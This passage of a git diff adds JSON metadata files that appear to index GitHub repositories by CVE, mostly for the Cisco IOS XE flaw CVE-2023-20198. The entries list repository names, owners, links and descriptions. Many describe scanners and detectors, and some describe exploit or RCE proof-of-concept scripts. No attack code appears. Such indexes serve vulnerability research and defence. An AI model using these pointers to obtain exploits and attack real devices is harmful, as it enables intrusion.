+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20048.json b/2023/CVE-2023-20048.json
new file mode 100644
index 0000000000..176c0be7fb
--- /dev/null
+++ b/2023/CVE-2023-20048.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 771806530,
+ "name": "FuegoTest",
+ "full_name": "0zer0d4y\/FuegoTest",
+ "owner": {
+ "login": "0zer0d4y",
+ "id": 163229114,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163229114?v=4",
+ "html_url": "https:\/\/github.com\/0zer0d4y"
+ },
+ "html_url": "https:\/\/github.com\/0zer0d4y\/FuegoTest",
+ "description": "A CLI tool for detecting CVE-2023-20048 vulnerability in Cisco Firepower Management Center.",
+ "fork": false,
+ "created_at": "2024-03-14T01:32:41Z",
+ "updated_at": "2024-03-14T02:00:34Z",
+ "pushed_at": "2024-03-14T01:59:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cisco-firepower-management-center",
+ "cve-2023-20048",
+ "security-tools"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20052.json b/2023/CVE-2023-20052.json
new file mode 100644
index 0000000000..5091da43b1
--- /dev/null
+++ b/2023/CVE-2023-20052.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 668173510,
+ "name": "CVE-2023-20052",
+ "full_name": "cY83rR0H1t\/CVE-2023-20052",
+ "owner": {
+ "login": "cY83rR0H1t",
+ "id": 48300212,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48300212?v=4",
+ "html_url": "https:\/\/github.com\/cY83rR0H1t"
+ },
+ "html_url": "https:\/\/github.com\/cY83rR0H1t\/CVE-2023-20052",
+ "description": "CVE-2023-20052 information leak vulnerability in the DMG file parser of ClamAV",
+ "fork": false,
+ "created_at": "2023-07-19T07:39:20Z",
+ "updated_at": "2023-09-10T09:29:38Z",
+ "pushed_at": "2023-09-10T09:56:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20073.json b/2023/CVE-2023-20073.json
new file mode 100644
index 0000000000..4d51d3aca4
--- /dev/null
+++ b/2023/CVE-2023-20073.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 679959255,
+ "name": "CVE-2023-20073",
+ "full_name": "RegularITCat\/CVE-2023-20073",
+ "owner": {
+ "login": "RegularITCat",
+ "id": 30820879,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30820879?v=4",
+ "html_url": "https:\/\/github.com\/RegularITCat"
+ },
+ "html_url": "https:\/\/github.com\/RegularITCat\/CVE-2023-20073",
+ "description": "PoC based on https:\/\/unsafe[.]sh\/go-173464.html research",
+ "fork": false,
+ "created_at": "2023-08-18T02:42:50Z",
+ "updated_at": "2023-08-19T21:11:24Z",
+ "pushed_at": "2023-08-18T04:00:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20110.json b/2023/CVE-2023-20110.json
new file mode 100644
index 0000000000..1d3681f871
--- /dev/null
+++ b/2023/CVE-2023-20110.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 667012414,
+ "name": "CVE-2023-20110",
+ "full_name": "redfr0g\/CVE-2023-20110",
+ "owner": {
+ "login": "redfr0g",
+ "id": 26508085,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26508085?v=4",
+ "html_url": "https:\/\/github.com\/redfr0g"
+ },
+ "html_url": "https:\/\/github.com\/redfr0g\/CVE-2023-20110",
+ "description": "PoC script for CVE-2023-20110 - Cisco Smart Software Manager On-Prem SQL Injection Vulnerability",
+ "fork": false,
+ "created_at": "2023-07-16T10:53:51Z",
+ "updated_at": "2024-04-20T01:38:50Z",
+ "pushed_at": "2023-07-16T11:11:33Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20198.json b/2023/CVE-2023-20198.json
new file mode 100644
index 0000000000..2d60a8923f
--- /dev/null
+++ b/2023/CVE-2023-20198.json
@@ -0,0 +1,701 @@
+[
+ {
+ "id": 706041284,
+ "name": "CVE-2023-20198-checker",
+ "full_name": "raystr-atearedteam\/CVE-2023-20198-checker",
+ "owner": {
+ "login": "raystr-atearedteam",
+ "id": 143163794,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143163794?v=4",
+ "html_url": "https:\/\/github.com\/raystr-atearedteam"
+ },
+ "html_url": "https:\/\/github.com\/raystr-atearedteam\/CVE-2023-20198-checker",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-17T07:35:50Z",
+ "updated_at": "2023-10-17T07:36:19Z",
+ "pushed_at": "2023-10-17T07:52:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 706050725,
+ "name": "CVE-2023-20198",
+ "full_name": "Atea-Redteam\/CVE-2023-20198",
+ "owner": {
+ "login": "Atea-Redteam",
+ "id": 108491572,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108491572?v=4",
+ "html_url": "https:\/\/github.com\/Atea-Redteam"
+ },
+ "html_url": "https:\/\/github.com\/Atea-Redteam\/CVE-2023-20198",
+ "description": "CVE-2023-20198 Checkscript",
+ "fork": false,
+ "created_at": "2023-10-17T08:00:18Z",
+ "updated_at": "2024-04-01T11:30:40Z",
+ "pushed_at": "2023-10-23T20:19:49Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 706260017,
+ "name": "cisco-CVE-2023-20198-tester",
+ "full_name": "securityphoenix\/cisco-CVE-2023-20198-tester",
+ "owner": {
+ "login": "securityphoenix",
+ "id": 61992902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61992902?v=4",
+ "html_url": "https:\/\/github.com\/securityphoenix"
+ },
+ "html_url": "https:\/\/github.com\/securityphoenix\/cisco-CVE-2023-20198-tester",
+ "description": "cisco-CVE-2023-20198-tester ",
+ "fork": false,
+ "created_at": "2023-10-17T15:44:01Z",
+ "updated_at": "2023-10-19T10:01:05Z",
+ "pushed_at": "2023-10-20T14:43:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 706337485,
+ "name": "Simple-Ansible-for-CVE-2023-20198",
+ "full_name": "emomeni\/Simple-Ansible-for-CVE-2023-20198",
+ "owner": {
+ "login": "emomeni",
+ "id": 6424128,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6424128?v=4",
+ "html_url": "https:\/\/github.com\/emomeni"
+ },
+ "html_url": "https:\/\/github.com\/emomeni\/Simple-Ansible-for-CVE-2023-20198",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-17T18:46:21Z",
+ "updated_at": "2023-10-23T09:51:01Z",
+ "pushed_at": "2023-10-17T18:46:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 706412262,
+ "name": "CVE-2023-20198-Checker",
+ "full_name": "ZephrFish\/CVE-2023-20198-Checker",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2023-20198-Checker",
+ "description": "CVE-2023-20198 & 0Day Implant Scanner",
+ "fork": false,
+ "created_at": "2023-10-17T22:41:14Z",
+ "updated_at": "2024-05-29T06:18:05Z",
+ "pushed_at": "2023-10-23T00:19:21Z",
+ "stargazers_count": 31,
+ "watchers_count": 31,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 31,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 706567964,
+ "name": "CVE-2023-20198",
+ "full_name": "JoyGhoshs\/CVE-2023-20198",
+ "owner": {
+ "login": "JoyGhoshs",
+ "id": 36255129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36255129?v=4",
+ "html_url": "https:\/\/github.com\/JoyGhoshs"
+ },
+ "html_url": "https:\/\/github.com\/JoyGhoshs\/CVE-2023-20198",
+ "description": "Checker for CVE-2023-20198 , Not a full POC Just checks the implementation and detects if hex is in response or not",
+ "fork": false,
+ "created_at": "2023-10-18T07:53:29Z",
+ "updated_at": "2023-10-18T07:58:31Z",
+ "pushed_at": "2023-10-18T07:58:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 706591699,
+ "name": "CVE-2023-20198",
+ "full_name": "Tounsi007\/CVE-2023-20198",
+ "owner": {
+ "login": "Tounsi007",
+ "id": 50546276,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50546276?v=4",
+ "html_url": "https:\/\/github.com\/Tounsi007"
+ },
+ "html_url": "https:\/\/github.com\/Tounsi007\/CVE-2023-20198",
+ "description": "CVE-2023-20198 PoC (!)",
+ "fork": false,
+ "created_at": "2023-10-18T08:50:49Z",
+ "updated_at": "2023-10-26T02:37:03Z",
+ "pushed_at": "2023-10-17T14:02:51Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 706759894,
+ "name": "CVE_2023_20198_Detector",
+ "full_name": "alekos3\/CVE_2023_20198_Detector",
+ "owner": {
+ "login": "alekos3",
+ "id": 79263622,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79263622?v=4",
+ "html_url": "https:\/\/github.com\/alekos3"
+ },
+ "html_url": "https:\/\/github.com\/alekos3\/CVE_2023_20198_Detector",
+ "description": "This script can identify if Cisco IOS XE devices are vulnerable to CVE-2023-20198",
+ "fork": false,
+ "created_at": "2023-10-18T15:04:57Z",
+ "updated_at": "2023-10-24T20:08:54Z",
+ "pushed_at": "2023-10-31T01:53:47Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 707531165,
+ "name": "Cisco_CVE-2023-20198",
+ "full_name": "reket99\/Cisco_CVE-2023-20198",
+ "owner": {
+ "login": "reket99",
+ "id": 42685719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42685719?v=4",
+ "html_url": "https:\/\/github.com\/reket99"
+ },
+ "html_url": "https:\/\/github.com\/reket99\/Cisco_CVE-2023-20198",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-20T05:28:40Z",
+ "updated_at": "2023-10-20T09:13:11Z",
+ "pushed_at": "2023-10-19T13:44:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 707768225,
+ "name": "cve-2023-20198",
+ "full_name": "iveresk\/cve-2023-20198",
+ "owner": {
+ "login": "iveresk",
+ "id": 28754633,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4",
+ "html_url": "https:\/\/github.com\/iveresk"
+ },
+ "html_url": "https:\/\/github.com\/iveresk\/cve-2023-20198",
+ "description": "1vere$k POC on the CVE-2023-20198",
+ "fork": false,
+ "created_at": "2023-10-20T16:01:17Z",
+ "updated_at": "2023-12-06T03:03:43Z",
+ "pushed_at": "2023-10-20T21:51:52Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 707899105,
+ "name": "CVE-2023-20198",
+ "full_name": "sohaibeb\/CVE-2023-20198",
+ "owner": {
+ "login": "sohaibeb",
+ "id": 25540162,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25540162?v=4",
+ "html_url": "https:\/\/github.com\/sohaibeb"
+ },
+ "html_url": "https:\/\/github.com\/sohaibeb\/CVE-2023-20198",
+ "description": "CISCO CVE POC SCRIPT",
+ "fork": false,
+ "created_at": "2023-10-20T23:34:12Z",
+ "updated_at": "2024-06-21T00:11:38Z",
+ "pushed_at": "2023-10-21T00:31:42Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 708870245,
+ "name": "cisco-ios-xe-implant-detection",
+ "full_name": "fox-it\/cisco-ios-xe-implant-detection",
+ "owner": {
+ "login": "fox-it",
+ "id": 468621,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/468621?v=4",
+ "html_url": "https:\/\/github.com\/fox-it"
+ },
+ "html_url": "https:\/\/github.com\/fox-it\/cisco-ios-xe-implant-detection",
+ "description": "Cisco IOS XE implant scanning & detection (CVE-2023-20198, CVE-2023-20273)",
+ "fork": false,
+ "created_at": "2023-10-23T14:52:18Z",
+ "updated_at": "2024-05-10T10:51:53Z",
+ "pushed_at": "2023-11-07T12:21:26Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "badcandy",
+ "cisco",
+ "cisco-ios-xe",
+ "cve-2023-20198",
+ "cve-2023-20273",
+ "iocisco",
+ "pcap",
+ "suricata"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 708903459,
+ "name": "CVE-2023-20198",
+ "full_name": "Pushkarup\/CVE-2023-20198",
+ "owner": {
+ "login": "Pushkarup",
+ "id": 148672587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4",
+ "html_url": "https:\/\/github.com\/Pushkarup"
+ },
+ "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-20198",
+ "description": "A PoC for CVE 2023-20198",
+ "fork": false,
+ "created_at": "2023-10-23T16:04:23Z",
+ "updated_at": "2024-02-12T20:11:46Z",
+ "pushed_at": "2023-10-23T19:10:41Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 708983573,
+ "name": "CVE-2023-20198-Scanner",
+ "full_name": "Shadow0ps\/CVE-2023-20198-Scanner",
+ "owner": {
+ "login": "Shadow0ps",
+ "id": 6516174,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516174?v=4",
+ "html_url": "https:\/\/github.com\/Shadow0ps"
+ },
+ "html_url": "https:\/\/github.com\/Shadow0ps\/CVE-2023-20198-Scanner",
+ "description": "This is a webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273",
+ "fork": false,
+ "created_at": "2023-10-23T19:25:29Z",
+ "updated_at": "2024-02-05T20:58:16Z",
+ "pushed_at": "2023-10-24T18:17:43Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": true,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 709227946,
+ "name": "CVE-2023-20198",
+ "full_name": "kacem-expereo\/CVE-2023-20198",
+ "owner": {
+ "login": "kacem-expereo",
+ "id": 115718278,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115718278?v=4",
+ "html_url": "https:\/\/github.com\/kacem-expereo"
+ },
+ "html_url": "https:\/\/github.com\/kacem-expereo\/CVE-2023-20198",
+ "description": "Check a target IP for CVE-2023-20198",
+ "fork": false,
+ "created_at": "2023-10-24T09:36:37Z",
+ "updated_at": "2023-10-26T09:12:20Z",
+ "pushed_at": "2023-10-24T09:42:38Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 709677069,
+ "name": "CVE-2023-20198-IOS-XE-Scanner",
+ "full_name": "mr-r3b00t\/CVE-2023-20198-IOS-XE-Scanner",
+ "owner": {
+ "login": "mr-r3b00t",
+ "id": 14963690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4",
+ "html_url": "https:\/\/github.com\/mr-r3b00t"
+ },
+ "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2023-20198-IOS-XE-Scanner",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T07:13:59Z",
+ "updated_at": "2023-10-25T12:20:24Z",
+ "pushed_at": "2023-10-25T11:40:13Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 710019547,
+ "name": "CVE-2023-20198",
+ "full_name": "ohlawd\/CVE-2023-20198",
+ "owner": {
+ "login": "ohlawd",
+ "id": 55877722,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55877722?v=4",
+ "html_url": "https:\/\/github.com\/ohlawd"
+ },
+ "html_url": "https:\/\/github.com\/ohlawd\/CVE-2023-20198",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T21:02:22Z",
+ "updated_at": "2023-10-25T21:03:27Z",
+ "pushed_at": "2023-10-25T21:03:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 710023699,
+ "name": "CVE-2023-20198",
+ "full_name": "IceBreakerCode\/CVE-2023-20198",
+ "owner": {
+ "login": "IceBreakerCode",
+ "id": 129914557,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129914557?v=4",
+ "html_url": "https:\/\/github.com\/IceBreakerCode"
+ },
+ "html_url": "https:\/\/github.com\/IceBreakerCode\/CVE-2023-20198",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T21:15:58Z",
+ "updated_at": "2023-10-25T21:40:42Z",
+ "pushed_at": "2023-10-25T21:20:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 713890378,
+ "name": "CVE-2023-20198",
+ "full_name": "RevoltSecurities\/CVE-2023-20198",
+ "owner": {
+ "login": "RevoltSecurities",
+ "id": 119435129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4",
+ "html_url": "https:\/\/github.com\/RevoltSecurities"
+ },
+ "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-20198",
+ "description": "An Exploitation script developed to exploit the CVE-2023-20198 Cisco zero day vulnerability on their IOS routers ",
+ "fork": false,
+ "created_at": "2023-11-03T13:05:59Z",
+ "updated_at": "2024-05-27T02:50:37Z",
+ "pushed_at": "2023-11-03T13:54:43Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 719665038,
+ "name": "CVE-2023-20198",
+ "full_name": "smokeintheshell\/CVE-2023-20198",
+ "owner": {
+ "login": "smokeintheshell",
+ "id": 19311214,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19311214?v=4",
+ "html_url": "https:\/\/github.com\/smokeintheshell"
+ },
+ "html_url": "https:\/\/github.com\/smokeintheshell\/CVE-2023-20198",
+ "description": "CVE-2023-20198 Exploit PoC",
+ "fork": false,
+ "created_at": "2023-11-16T16:39:38Z",
+ "updated_at": "2024-06-19T08:21:20Z",
+ "pushed_at": "2023-12-07T22:34:43Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 729302860,
+ "name": "CVE-2023-20198-Fix",
+ "full_name": "netbell\/CVE-2023-20198-Fix",
+ "owner": {
+ "login": "netbell",
+ "id": 47117028,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47117028?v=4",
+ "html_url": "https:\/\/github.com\/netbell"
+ },
+ "html_url": "https:\/\/github.com\/netbell\/CVE-2023-20198-Fix",
+ "description": "Check for and remediate conditions that make an IOS-XE device vulnerable to CVE-2023-20198",
+ "fork": false,
+ "created_at": "2023-12-08T21:12:00Z",
+ "updated_at": "2023-12-08T21:12:00Z",
+ "pushed_at": "2023-12-09T17:03:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 730163821,
+ "name": "Cisco_CVE-2023-20198",
+ "full_name": "Vulnmachines\/Cisco_CVE-2023-20198",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/Cisco_CVE-2023-20198",
+ "description": "Cisco CVE-2023-20198",
+ "fork": false,
+ "created_at": "2023-12-11T10:41:48Z",
+ "updated_at": "2023-12-11T18:45:44Z",
+ "pushed_at": "2023-12-11T10:44:03Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 791680827,
+ "name": "CVE-2023-20198-RCE",
+ "full_name": "W01fh4cker\/CVE-2023-20198-RCE",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-20198-RCE",
+ "description": "CVE-2023-20198-RCE, support adding\/deleting users and executing cli commands\/system commands.",
+ "fork": false,
+ "created_at": "2024-04-25T06:59:53Z",
+ "updated_at": "2024-06-24T10:50:31Z",
+ "pushed_at": "2024-04-25T07:32:57Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-20209.json b/2023/CVE-2023-20209.json
new file mode 100644
index 0000000000..1ac09720a2
--- /dev/null
+++ b/2023/CVE-2023-20209.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 697854392,
+ "name": "CVE-2023-20209",
+ "full_name": "peter5he1by\/CVE-2023-20209",
+ "owner": {
+ "login": "peter5he1by",
+ "id": 86906331,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86906331?v=4",
+ "html_url": "https:\/\/github.com\/peter5he1by"
+ },
+ "html_url": "https:\/\/github.com\/peter5he1by\/CVE-2023-20209",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-28T15:55:22Z",
+ "updated_at": "2023-10-05T10:57:42Z",
+ "pushed_at": "2023-09-27T09:38:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2023.json b/2023/CVE-2023-2023.json
new file mode 100644
index 0000000000..c7a22af8ee
--- /dev/null
+++ b/2023/CVE-2023-2023.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 679185431,
+ "name": "Hvv2023",
+ "full_name": "thatformat\/Hvv2023",
+ "owner": {
+ "login": "thatformat",
+ "id": 46617017,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46617017?v=4",
+ "html_url": "https:\/\/github.com\/thatformat"
+ },
+ "html_url": "https:\/\/github.com\/thatformat\/Hvv2023",
+ "description": "HW2023@POC@EXP@CVE-2023-2023",
+ "fork": false,
+ "created_at": "2023-08-16T09:30:24Z",
+ "updated_at": "2024-06-25T01:51:34Z",
+ "pushed_at": "2023-08-16T08:17:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 23,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 23,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 758110379,
